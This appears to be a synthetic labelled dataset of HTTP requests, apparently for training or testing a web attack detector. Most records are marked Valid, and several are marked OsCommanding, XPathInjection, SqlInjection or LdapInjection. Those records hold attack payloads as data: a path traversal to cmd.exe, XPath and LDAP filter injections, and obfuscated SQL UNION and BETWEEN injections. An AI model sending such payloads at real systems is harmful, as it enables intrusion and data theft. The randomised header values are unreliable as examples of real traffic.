ETag: W/"8h235ie@AK98TIdSiz"
Expect: eReoosil
From: rnda3N@eUsEnd.cz
If-Modified-Since: Thu, 13 May 04 05:25:34 GMT
If-Unmodified-Since: Thu, 30 Apr 09 22:42:53 UTC
If-Match: "Sl9-A_SzyfiU-kvsLXx"
If-None-Match: "yhA8NaXvPmLMSk@K"
If-Range: "RwMqNZoppBbHuPGkK"
Max-Forwards: 3222
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: NTLM T3BpNHNobmVlYnNEdzhyaVRpOWp1cnVvdHRlVWp0QXduMGkyZVM=
Authorization: Digest realm
Range: 3-90,72191-
Referer: /Esii.mpg
TE: chunked,chunked;q=0.8
Trailer: Connection
User-Agent: Mozilla/0.1 (Machintosh; U; Mac OS X 7.2; t3-eo; rv:6.9.7) Gecko/69924372
UA-CPU: MIPS
UA-Disp: 6357,331,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 669x1617
Via: 0.3 43.225.204.54:8997
Transfer-Encoding: identity
Upgrade: geop/6.3, gadsi/7.1, Risfc/1.7, ieeeh8/4.3, ht1/2.2
Warning: 393 www.e0nt7dn.jpeg "mel9ehnAlnr" "Sun, 07 Sep 08 05:30:02 UTC"
X-Forwarded-For: 205.233.18.56
X-Serial-Number: 660220011832076689
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

GhpositionlSu=6Fix1nULqv4c&at4esyesCoe=1833030&s3No5hmshetrEGk=e4af&bRGL3LnEVZG=souCteAu0&obody5lgh7oSmjA=hn2T&gblwd8suleTa1n=(elink&v&eoodagoviny=eLJKE9X&la6h0=0JEx&8erpoaTiy=Ad3ohHc&dnohkjHhg=tyr8jeTt&wrEodteiknn=35&nr3egtHo=58682&tDzCi-aperlL=27597&nfcw1eeunonyi=o3c

End - Id: 7851
Start - Id: 26460
class: Valid
GET /aH5ZzCBRIsvW8zv0mV/hS@fIJo46LdpFP@ZVx/H05LKn.3wp-yV/mjh_/7WLMGkaccess_log@ocyvT/ostdsNEsx/lTdmDwt/IfphpXHgDlibS/Tondaipiona.js?fnbai=970127371&u1zs3iSmeEh4s=9NMR3s2JzQ&bJictuPTg8passwd5=35&nncyYo2=9&fnull9rL43SDunion_V=rL2p&Jsrwmocha=E0%28Giop&nzssgpeodiijo=879&wd=tmprhs&oKuEEumtgs=582%40ZAJmRa&PNQcnhupdate1=97670976&3e=petfyk HTTP/1.1
Host: 232.176.211.218:70886
Connection: keep-alive
Accept: */*
Accept-Charset: shift_jis;q=0.0, iso-8859-9
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 243.242.93.110
Cookie: meaner1jha=93267257;IiVIsca3mngc0eu=ow6ocnbeeiae;aauotigij=aodn
Cookie2: $Version="6"
Date: Sun, 30 Sep 07 01:41:49 UTC
ETag: W/"aH2jp.pfySLbmKqBQ"
Expect: tipoj=egai
From: nthers@Iodoaa9t.it
If-Modified-Since: Sun, 05 Jun 05 10:36:40 GMT
If-Unmodified-Since: Sat, 05 Nov 05 12:10:11 UTC
If-Match: "y7l3YUv-rRRi7wvUXEsk"
If-None-Match: *
If-Range: "zvbtGWGZjTGL_WP5"
Max-Forwards: 64
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: Digest username="tmff8btS"
Authorization: NTLM aXAycmFyM2lpYWxiZG5sOWVvYW5zYW5udW9lTXRpenR3bndyNnQ=
Range: -3
Referer: /4nheTiu.txt
TE: trailers,gzip;q=0.6
Trailer: From
User-Agent: H3aa07ethh/0.8
UA-CPU: StrongARM
UA-Disp: 719,2731,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 326x7197
Via: HTTP/6.1 3.68.123.192, HTTP/3.5 www.iE1ia.js, HTTP/5.4 138.211.155.198
Transfer-Encoding: gzip
Upgrade: Eevtr/5.1, sybrvn/0.7
Warning: 220 www.o3thefd.html "7cronrpc" "Thu, 19 Apr 07 17:54:26 UTC"
X-Forwarded-For: 135.109.117.133
X-Serial-Number: 101021310
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26460
Start - Id: 30744
class: Valid
GET /b5itd/une/9script9frompHwbinsWOIlibA/iADwSqpu9B.-5h/51t84srna0Eivnr/PgqZnMNQoih/ttikyTperwerw/xVLY/r9/sae8tcadgxo.asp?bEJ=920 HTTP/1.1
Host: www.entotmAa.org:9207
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: x-mac-ce;q=0.4, x-mac-greek;q=0.2, cp-950;q=0.0, iso-8859-2
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: max-stale=3957
Client-ip: 45.133.46.216
Cookie: Pdropeq54O0IwgetxY=2rCr;YD=He nTnodefe;ufegraeF=s_T4
Cookie2: $Version="6"
Date: Tue, 20 Sep 05 10:28:38 UTC
ETag: "dMIaGbKdu_QMIv1"
Expect: niga9dL
From: dubt@tmrdi.net
If-Modified-Since: Sat, 28 Aug 04 20:06:08 GMT
If-Unmodified-Since: Tue, 25 Aug 09 08:44:00 CET
If-Match: *
If-None-Match: "c30brrYCAmMEE-2"
If-Range: "9IxvFJ5PdHnaW@r8ORO"
Max-Forwards: 5
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Basic SW5ZZHJxOjdpbWxyZQ==
Authorization: Digest nonce
Range: 4297-25184
Referer: http://www.oo766.it/ohne3ii/sa2e/pPuaeet/3htxt.html
TE: trailers
Trailer: Proxy-Authorization
User-Agent: eaotl (oSP1AQBr8; lg4Jsz; cPlmCVsS4D; nSLpczT)
UA-CPU: PowerPC
UA-Disp: 593,0984,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 9905x3128
Via: FTP/0.1 www.atsNidkr.gif, FTP/5.8 www.rrnar5c.css
Transfer-Encoding: deflate
Upgrade: uom4/0.1, suMtl/8.8
Warning: 994 www.tuorse.js:74927 "slsp2oatzxr0wEyhOhx" 
X-Forwarded-For: 226.201.113.37
X-Serial-Number: 567820794809201
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30744
Start - Id: 43968
class: OsCommanding
GET .%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 163.9.177.90
Connection: Ebielh
Accept: */*;q=0.8
Accept-Charset: cp-932, koi8;q=0.3, windows-1252, euc-kr;q=0.7
Accept-Encoding: 
Accept-Language: tt-cd;q=0.5, iecbei-hgxeeq2;q=0.6
Cache-Control: max-age=5073
Client-ip: 112.139.123.3
Cookie: eArsu=407;TA@rE=Sayeghniro8ge
Cookie2: $Version="45"
Date: Wed, 10 Jun 09 05:06:18 UTC
ETag: "d0_qiYUs1JJWIAlbJB6"
Expect: naaaaho=iektd;i12sv
From: axenii@lMdner.de
If-Modified-Since: Sat, 20 May 06 19:30:11 CET
If-Unmodified-Since: Fri, 20 Feb 04 04:23:12 UTC
If-Match: "-p2rLxjVRyesjAFX.Q"
If-None-Match: *
If-Range: Fri, 04 Mar 05 16:36:47 UTC
Max-Forwards: 0
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: Digest nc=E191EEa9
Authorization: NTLM VHVNYWVyN3Rzbml0d2lzcnBybGFqZXZsdm8wbGdkaWM=
Range: 2873-08
Referer: http://www.hua6.ch/osyre/rraQwehn/tcesLstk.jpg
TE: trailers,trailers
Trailer: Referer
User-Agent: Mozilla/5.2 (X11; U; Open BSD i386 3.6; 9k-sh; rv:2.3.8) Gecko/73233614
UA-CPU: 68000
UA-Disp: 7638,7203,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 2346x026
Via: 7.9 35.81.119.170
Transfer-Encoding: identity
Upgrade: pAn/5.4, eynSnm/6.6
Warning: 185 www.ayfae.tiff:7 "h2dyo3oifn2sa9H7" 
X-Forwarded-For: 67.28.144.149
X-Serial-Number: 221610848523557
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 43968
Start - Id: 49492
class: XPathInjection
GET /a6VvPjk6PHThI.exe?fseiEeahe=yis%2F4b%2Ffo%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D24%5D+++++or++++%27saaentt%27+++%3D+%27&cdt1aa7r3WZe=5 HTTP/1.1
Host: www.lntbsm.fr
Connection: vecoase6
Accept: audio/basic;q=0.1, application/postscript;q=0.7
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 223.242.155.63
Cookie: hANTYB=aos3tDloe;yNos3ahnt6v8eli=035_B3QVO5Z0;cmdmLfaVlibgwherereplace=2200561231;@qdCOunc@2Dw=yz
Cookie2: $Version="672"
Date: Wed, 19 Jan 05 03:08:24 UTC
ETag: "JDg6S18LaQ9Ja_0YULOc"
Expect: zimlrze=7x4eo
From: heDlu@i6la6.fr
If-Modified-Since: Mon, 21 Jun 04 01:02:42 UTC
If-Unmodified-Since: Tue, 05 Sep 06 17:04:25 CET
If-Match: *
If-None-Match: *
If-Range: "7-a8uyyKzeZr_c4Utg"
Max-Forwards: 7232
MIME-Version: 4.4
Pragma: no-cache
Proxy-Authorization: 79Ynan eOtsi=mrfenfti
Authorization: Basic ZjNJYW1MOm5sZWxUbmhl
Range: -012
Referer: /8pomG6ne/rCbru/sahtniy.ace
TE: deflate
Trailer: Authorization
User-Agent: HF4Ehtysnoles
UA-CPU: Sparc
UA-Disp: 4263,349,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 527x1451
Via: FTP/6.6 221.185.154.74, HTTP/2.7 46.208.240.221
Transfer-Encoding: identity
Upgrade: n7e/3.5, tspSaa/1.0, aveuwt/9.7
Warning: 769 www.giteyoe.png "lena5ieoo" 
X-Forwarded-For: 206.176.73.188
X-Serial-Number: 201583507
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 49492
Start - Id: 35697
class: XPathInjection
GET /lawQdBRkjZr.msf?ueojgauaqat=hemb5%27+++or+++++aeH%2FtgA%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D96%5D+or++%27t4orb%27++%3D+++%27&ahOjrubtdo=w9j1n3n&hro4vE5rueal3z8=pE.slMl%40&acOxliee=5888962&5ATLIK5M5=iatear&ygsC=eo+etpsconnectdwstyle%5B0 HTTP/1.1
Host: www.heg7n.be
Connection: close
Accept: */*;q=0.4
Accept-Charset: us-ascii, us-ascii, iso-8859-3;q=0.3, x-mac-turkish;q=0.6, iso-8859-1;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=72242
Client-ip: 87.168.72.128
Cookie: goprlu=nnsnwi9wosce;alys=eolauvE6ftby
Cookie2: $Version="0"
Date: Sun, 11 Oct 09 07:20:06 UTC
ETag: W/"3V3tBdlDozt7JvZcGC"
Expect: oewawp=int6;rsuoezt=saaKs
From: xcsXifnE@tneljth.ch
If-Modified-Since: Wed, 11 Jul 07 16:10:40 UTC
If-Unmodified-Since: Sun, 13 Jun 04 22:51:34 GMT
If-Match: "ce@W19j08Dn-LyjapeEN"
If-None-Match: "rlzk8rqxdGrIZMUJF"
If-Range: *
Max-Forwards: 9
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: ndsOth k8so=nlmc
Authorization: NTLM ZWtucHBJbW50dHN0YnJlZ2Nub3RpZUVjZXUyZGE5Zzh5c1I=
Range: 5225-,8-9,1-
Referer: /4es6li.bin
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/9.1 (Windows; U; Win98 2.9; cu-6e; rv:3.8.3) Gecko/05619325
UA-CPU: Sparc
UA-Disp: 9150,2216,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 656x763
Via: FTP/3.8 176.165.200.193
Transfer-Encoding: identity
Upgrade: dOa8/7.7, iisei/3.4, ylle/7.0, laix/9.7, vbeu/5.2
Warning: 134 179.206.30.120 "oxtqt" "Tue, 25 Sep 07 03:29:34 CET"
X-Forwarded-For: 204.215.211.182
X-Serial-Number: 727389738621693748
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35697
Start - Id: 21411
class: Valid
GET /d2shbhvGFVY_pTmwtJJt/ndfenHueAneticg.jpg?m8na3rns8e=urv&nqjhoNEnnceht5=73&9cAeinag3ldt=cncIb_4RUjB&uen=7540878645&ialanyisps=tlfgsphz5naaNhu&tvnodonex1doze=25&ihit1o6esc1h=eLk5s2FUASCZ&qLchildc=wQbnetcatdtlTsge0eai HTTP/1.1
Host: 176.186.210.118:631
Connection: hqli3i
Accept: application/*, video/*;q=0.9, text/*
Accept-Charset: *
Accept-Encoding: gzip, identity
Accept-Language: rc11Bn-3ho;q=0.4, tqsgu-wmawakza;q=0.1
Cache-Control: rL='dfbe'
Client-ip: 255.170.108.35
Cookie: dlCwe=%rmscripttoiadvbscripttskrl;6t8=Rhigyax;ioIwrr6d=171705123
Cookie2: $Version="3"
Date: Mon, 13 Apr 09 12:38:20 GMT
ETag: "i4tZM1cZHYd0h@8Sv"
Expect: qntPidc=jxEE3hka;one4o=e1n7
From: 2t9et@hgaorWhudc.ch
If-Modified-Since: Tue, 10 Oct 06 18:15:30 GMT
If-Unmodified-Since: Tue, 21 Mar 06 10:26:57 CET
If-Match: *
If-None-Match: "y71DgebIHHn-36M7v6eq"
If-Range: "epBL93y6Xrt4SSgL4"
Max-Forwards: 843
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: Digest realm
Range: 9389-552,913284-,86-
Referer: http://dlpico.cz/aSrer.png
TE: trailers,chunked;q=0.6
Trailer: From
User-Agent: sbdft (i-VSu1RE_; tmu7v8aHB@)
UA-CPU: Sparc
UA-Disp: 6376,0383,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 528x4272
Via: 4.3 139.58.207.84, 7.1 www.oyin.gif, 8.6 201.172.208.189:573
Transfer-Encoding: gzip
Upgrade: O9a1kz/8.8, oleC/5.4, shee/7.3
Warning: 217 7.232.161.211 "en9ruae" 
X-Forwarded-For: 131.153.107.61
X-Serial-Number: 2418413
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21411
Start - Id: 42519
class: SqlInjection
GET /peeat450e2T0/@UVokj/Bx@xSw5X335d9/r.K1knRvb/lsclt9anndr1qE/mMUh0/thkxCk/ort/eE0FTA3ciJewuVr/zqnpieidOhEnrcc5cO.tiff?yeaepcarn6noc=hk%5Cn&NfoorrmR4j=7xBcJbkXNUA&hatleCgin=7s&cIrebdvk1zugP=%7Cdocumenteco&relesbccFeg3r=di7hphtEmi1Tr%3Baf1vt&gsmeOh=%3B+EXEC%28+%27UNI%27%2B%27ON%27%2B%27+++++%27%2B%27SEL%27%2B%27ECT+++++%27ols5Li%27%2C98870%2C073%2C%27eorbw%27%2C9+FROM++te%29&TiQa89Tall9=hfZxSRqelktAe&19qwget5lM1_8gand=nhvs%7E&phTdr3Sia=+ns5&iKiafseshe=400430298&8i6mmYr=nph-d&lteiteevw5aw=825Rr%26%40shttwTyi&spiutmgjtmnrahr=opH%40 HTTP/1.1
Host: www.eyee5ipoe.uk
Connection: eenu
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 150.204.153.72
Cookie: nhtstaiEtrsalai=sWDx;rylepeena0wt=2034;Ghortbs=e2R
Cookie2: $Version="7"
Date: Fri, 22 Apr 05 15:52:44 UTC
ETag: "QTJNs90GRqYP0w9uxk2"
Expect: 100-continue
From: be38Ged@6e9snto.ch
If-Modified-Since: Sat, 06 Jun 09 02:07:16 UTC
If-Unmodified-Since: Tue, 30 Sep 08 14:33:18 CET
If-Match: "kpzyFdqRlRCIkQUVXBiE"
If-None-Match: *
If-Range: Sun, 24 Jul 05 21:46:04 CET
Max-Forwards: 43
MIME-Version: 6.0
Pragma: 5b=lEen
Proxy-Authorization: NTLM NXRXZGh0ZW81bXNzbm1nYXhudm1UZGR0aWFhZmVmcGV0c2FuZWVLZXJlcnM=
Authorization: etaEf Hnw8jooq=dget
Range: 430-,2-8084
Referer: http://www.NAhn3.gov/sMnA/eodanaeb.fgf
TE: trailers
Trailer: Via
User-Agent: Mozilla/6.2 (Windows; U; WinNT 5.8; 7S-a6; rv:2.4.5) Gecko/14577534
UA-CPU: x86
UA-Disp: 3013,748,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 8264x986
Via: 2.5 89.61.78.188
Transfer-Encoding: identity
Upgrade: iiruhh/4.7, Tnar/9.2, osto/3.0, ouuar/8.2
Warning: 039 www.rscr.js "tEodeseiset5e5eLbAid" 
X-Forwarded-For: 10.31.99.179
X-Serial-Number: 68264538863472
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42519
Start - Id: 41550
class: SqlInjection
PUT /ecasotCl15lsetxcl.mspx? HTTP/1.1
Content-Length: 204
Content-Language: Iaiirdja
Content-Encoding: gzip
Content-MD5: b2Z0ZVNJcnlvYWFBZWphSQ==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Thu, 21 Sep 06 24:13:56 UTC
Host: 202.129.169.57
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: euc-tw, iso-2022-kr;q=0.9
Accept-Encoding: compress;q=0.3, compress, gzip, deflate
Accept-Language: 3s-Dchsshaw, p6esec9u-uh2;q=0.3, tEt4ts7-pjnoagf, o-l;q=0.4
Cache-Control: Oeaoaaoe='9'
Date: Tue, 13 Jan 09 14:17:22 UTC
If-Unmodified-Since: Fri, 26 Feb 10 11:53:42 CET
If-None-Match: *
Max-Forwards: 2
Pragma: aha='ra3'
Referer: /bilca/seWae/SsikqenT/7eEM5/gOiecu3t.mspx
User-Agent: Mozilla/7.0 (X11; U; Linux i586 7.1; Mr-p0; rv:6.4.5) Gecko/34976067
Via: FTP/9.2 www.eama.gif, 2.7 23.117.171.4

euP75=gewgetolo5Gu5ltde&ulcadxfd=mMte\aniihp&t9gghiXk='    OR   'raaoa6gnee7' BETWEEN   'R'    AND     'T&S9qOaoso1a=184&sFemmq=5&ndlsshFodi9na=i8ty&givtenyEh=edeobaOcoea&sad=dIn6iop&CPK6=39

End - Id: 41550
Start - Id: 10099
class: Valid
GET /Getnteeedrdd9s4lstil/dgipasswd.msf?9ra3nw7=et7Lennespcr5&etkditjlnl=694618713&louqbpbesen=sbI22thhmeodf&tei=bNqumifViZ&niltPennnege=68&iahTe686tat6sp=8 HTTP/1.0
Host: 235.164.62.57:897
Connection: keep-alive
Accept: video/*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 251.140.55.187
Cookie: ro5ol=0542707;echoGamail=<ieeh s
Cookie2: $Version="5"
Date: Tue, 06 Dec 05 03:01:04 GMT
ETag: W/"mTcBSBHlhC3s6Y6x"
Expect: 100-continue
From: tsbr5seo@najlknme.it
If-Modified-Since: Sun, 22 Jan 06 12:40:43 UTC
If-Unmodified-Since: Tue, 02 Aug 05 11:25:55 CET
If-Match: "dTv5tHyRK6m5JZM"
If-None-Match: *
If-Range: *
Max-Forwards: 6
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: Basic d2lia25yczpzNnR0
Authorization: Basic eGVldHRhOk9tMUQ=
Range: 2-,2991-737219
Referer: http://dea4.gov/f92lo/7noeajo/ytz5bmeo/d7iN.css
TE: gzip;q=0.1,trailers
Trailer: If-Match
User-Agent: Mozilla/4.3 (compatible; tEuwf0lwi; Win 9x; ivoir1w1es; ebarbs; eeiexRot)
UA-CPU: 68000
UA-Disp: 886,964,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 9723x8891
Via: HTTP/6.7 111.67.200.23
Transfer-Encoding: compress
Upgrade: Nraco/5.1, 3tms/3.4
Warning: 301 www.Ipmhyt.jpeg "eqieennEenOi6nv" 
X-Forwarded-For: 219.87.157.60
X-Serial-Number: 70224009
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 10099
Start - Id: 37440
class: LdapInjection
GET /oFW/s2-f2-hehwgDL1f/a8QFDxDsi0GeBW/th/Tt1dsphoUfNuiewadyyn/oAKtNWYzvIPQo@IdqYhN/e@a3wFU83Csiy2LjcM6/M.SiNsystem0avApi1T/ineu8aad0dnt7itn/shDo/eahv8c/logODXpL.dll?q1oeiniecnpu=2046&zecr4egm=Qg&xG1mocha5P2eP=sjDx HTTP/1.0
Host: 215.52.201.186:80
Connection: close
Accept: application/postscript, application/*;q=0.9, audio/basic
Accept-Charset: gb2312, iso-8859-4;q=0.6, x-mac-arabic;q=0.8, x-mac-greek
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: min-fresh=5
Client-ip: 134.69.126.83
Cookie: ht9oetsrh=6m7k9gAX.D;SjsGdN7ke9=231;auedbgbrb=hcmd;oUodaoee=bh)(  |(wekmh=*);7ldrt3sas8ioh=nulleta
Cookie2: $Version="58"
Date: Wed, 26 Jan 05 23:35:02 UTC
ETag: W/"9yb6ubAF1-mBhQ6qS"
Expect: 2tws3=htmilE
From: arSeni@esqqy2etgc.cz
If-Modified-Since: Tue, 28 Oct 08 11:39:02 GMT
If-Unmodified-Since: Sun, 17 Jan 10 12:29:14 UTC
If-Match: "-kvNGdR-jzH4zd8KI"
If-None-Match: *
If-Range: Sun, 06 Jan 08 23:42:03 UTC
Max-Forwards: 4
MIME-Version: 6.9
Pragma: 3ehrhpf=z
Proxy-Authorization: nlct tngmes=oZoE0u
Authorization: NTLM RVNuZG9PdHp1MGRvalNIb0JlZWVic04wb2RlWWFkM2lh
Range: 5-,-09309
Referer: http://ahst.it/9Oodn/yiia/veln.gz
TE: trailers,deflate,deflate
Trailer: Cache-Control
User-Agent: Mozilla/7.7 (Windows; U; Windows NT 9.1; sv-5p; rv:0.8.7) Gecko/65108272
UA-CPU: x86
UA-Disp: 9236,912,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 5573x6323
Via: HTTP/5.2 42.59.133.142, 8.3 125.153.197.81
Transfer-Encoding: identity
Upgrade: ha76c/4.1, Dceo/6.5, ohampr/8.1, Hxa/3.5, mel/8.8
Warning: 343 94.74.47.202 "eqsris3" 
X-Forwarded-For: 218.58.31.100
X-Serial-Number: 89314981818
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37440
Start - Id: 15115
class: Valid
GET /i.B@ZpRzp.-jbkRbfp0/niuLr6pydr/as4G/oOAqL7z6ZXJBYcS/e6nt8oe7lqlu/eC8vMtX8ERYEV/olHNqxSm.html?fmnBeO=a1U.hMy2RUs&tadheeraetdtem=7855849&eu=taa&metal.3Z=hfareplace&lans5kaxkeh=osaedoe4&iTKb6=253&asg=%26twl&ttrqjntei7=601 HTTP/1.1
Host: www.6asqh.fr
Connection: ansd
Accept: */*
Accept-Charset: iso-8859-1
Accept-Encoding: identity;q=0.3, deflate
Accept-Language: nemiz-cjra, ctga-i, N-aotl;q=0.9, egz-w;q=0.8, 9onHrr-y
Cache-Control: no-transform
Client-ip: 17.176.248.173
Cookie: oamao9o=450;Lps0aeer=a0gsl;yauemhmtwnstzdt=$a;ZHh9=idDbehrlwre0eure;lusnml=2ordd;eu1nLs=322904
Cookie2: $Version="53"
Date: Sun, 21 Aug 05 12:16:53 UTC
ETag: "zdd4ZWquwmU-WkDX"
Expect: lrsaot
From: imduseE@sjAjn.fr
If-Modified-Since: Thu, 26 Jan 06 03:38:09 UTC
If-Unmodified-Since: Sun, 04 Jan 09 02:39:52 GMT
If-Match: "PiD5s3DOItY@Uzvd4xK"
If-None-Match: "GOn0Pr.v3bJsEjhW"
If-Range: "YdjtsaL@DUQNJW9b"
Max-Forwards: 1752
MIME-Version: 6.6
Pragma: sfkl5='rRsvp1f'
Proxy-Authorization: NTLM OWZsYUoxOGl0dHNhcmVyaWU4cm5vaHBtcnJkc25yTm5waGVs
Authorization: Digest opaque="antg1"
Range: 64-,-31
Referer: /sniut/krvrtnte/wbM6is/13chuN/omelt.js
TE: trailers
Trailer: Accept-Language
User-Agent: 3eami/3.0.2.6.2
UA-CPU: 68000
UA-Disp: 067,8316,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 1621x334
Via: 0.5 236.243.201.38
Transfer-Encoding: compress
Upgrade: n0Vse/5.9, isenso/0.6
Warning: 484 79.182.0.186 "vdrDggpdnIl5d9ttc" 
X-Forwarded-For: 79.50.237.25
X-Serial-Number: 698909369713747454
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15115
Start - Id: 14839
class: Valid
GET /TerjMnmrih6eTl/oLo8te/eeieSSf.gif?6o1uhithehft=%24x&nne4t9etnonzo7=3&shxt4e=37091720&epT=rine&eiosoWyuvoeart=%29oge&atsbeso7=36816968&l7c4tNaalna=%2Flz&JYOD56_gEo0=th&iaee=t9ita&TnV9JnJHbrp=-Dm%3D+so-ggr8olt&lep2tiehnrewwn=l19&JqVN@=s%3B%24samet+ortf7&rem5d=eDfiY HTTP/1.1
Host: 113.153.9.137:5
Connection: sDseatmn
Accept: text/html;q=0.8
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: eaPysnuA-p, s-jiaE, r1oam-qeuinhnt;q=0.7, rsnfrzpb-c
Cache-Control: only-if-cached
Client-ip: 35.5.220.119
Cookie: cth9r=neead9eRatg;qreee=811729837;ioutgftCttho=e7dc3?)eopt
Cookie2: $Version="33"
Date: Wed, 14 Sep 05 04:14:34 CET
ETag: W/"wX@sIpIys_g7Xdfl"
Expect: minii
From: se5tmG@5hndem.ch
If-Modified-Since: Sun, 06 Nov 05 05:34:39 GMT
If-Unmodified-Since: Thu, 28 Jun 07 18:47:11 GMT
If-Match: *
If-None-Match: *
If-Range: "ar-36AbNgQ.81JmKt-"
Max-Forwards: 10
MIME-Version: 2.8
Pragma: urge=nmdi
Proxy-Authorization: siht lnlisz=La0doi
Authorization: Digest username="iAr14"
Range: 974110-
Referer: http://www.bttbojze.it/d3iPrwwn/oIaYseon/atx5h/ih2wesho.mpeg
TE: trailers
Trailer: Host
User-Agent: Mozilla/6.2 (Windows; U; Windows NT 5.4; id-i3; rv:7.3.5) Gecko/23013778
UA-CPU: 68000
UA-Disp: 1041,483,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 923x8805
Via: 0.8 www.oig2.gif:8145, rdi/5.0 143.56.193.24:208
Transfer-Encoding: deflate
Upgrade: altl/2.2
Warning: 396 135.99.201.170 "ensfieereprG" 
X-Forwarded-For: 220.203.31.112
X-Serial-Number: 89813
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14839
Start - Id: 30007
class: Valid
GET /k4W8YY3I@FAcA/xaobnt/slOSU6p/eU/oe2neEcoooHsqi.shtml?ntcEaftoe9=6Ud HTTP/1.0
Host: 234.96.37.244
Connection: ucnet
Accept: audio/x-wav;q=0.3, image/*;q=0.4, video/*;q=0.2
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.7
Accept-Language: wmeg-p5oer, v-pEn6, cah9o-rh, lEtd4s-pr
Cache-Control: no-store
Client-ip: 142.42.77.41
Cookie: een=s6R;Oeadgi=4634646;etEnvcoa=echosa-nok;z1t=3;rrQt2=7437073;ldrDozi7Eatert=34
Cookie2: $Version="676"
Date: Sun, 13 Feb 05 21:21:34 CET
ETag: "Vd9T_.-zQHzMcPDdh"
Expect: 100-continue
From: aeeNsEvt@wbsohnw.st
If-Modified-Since: Mon, 17 Oct 05 09:36:19 UTC
If-Unmodified-Since: Sun, 04 Feb 07 05:59:25 CET
If-Match: *
If-None-Match: "m@lNJv2q0edU8pRN-"
If-Range: "Qmt-ztB-@QPHELMh"
Max-Forwards: 0623
MIME-Version: 4.2
Pragma: h4rult9=hTuEb
Proxy-Authorization: Basic OHdmZTFrcjpvYWlucmVlcw==
Authorization: Digest realm
Range: 407657-,-1719
Referer: /E5scn/R1qah/sieHwot.msf
TE: gzip;q=0.5
Trailer: Accept-Encoding
User-Agent: imte4 (dK1MnQF_)
UA-CPU: 68000
UA-Disp: 644,8528,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 5067x616
Via: 5.4 130.210.151.238, FTP/8.5 247.46.230.68:69, 0.2 5.157.109.105
Transfer-Encoding: freane; tdlHteI=atnerpa
Upgrade: zco8u/3.9, 7ddF/2.0, P5tob/6.7
Warning: 929 111.138.94.34 "fYos2dhjediq09q9ela" "Sun, 20 Sep 09 07:36:42 GMT"
X-Forwarded-For: 69.246.154.213
X-Serial-Number: 2857393
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30007
Start - Id: 9493
class: Valid
GET /jClaoesegsQs/8deve9dnaans.bin?shku51=0tttd&medemKdteanrokt=c0pEMgslqlolulK5eb HTTP/1.0
Host: www.YghI.net
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: euc-cn;q=0.4, cp-932, iso-8859-3
Accept-Encoding: identity, gzip, deflate;q=0.5, deflate
Accept-Language: *
Cache-Control: no-transform
Client-ip: 193.31.132.105
Cookie: 2t2so=s;o<Hrpga+;gIFqAVS4O=hspigaereo;CRONNlZbinz33=ehthpai;eotsc6=sf;nph-hR535m@x=4632381
Cookie2: $Version="5"
Date: Tue, 29 May 07 18:56:19 GMT
ETag: "UeKc-0DX@Mp6bT@Q7O.t"
Expect: Aeliroai=koaupaxr
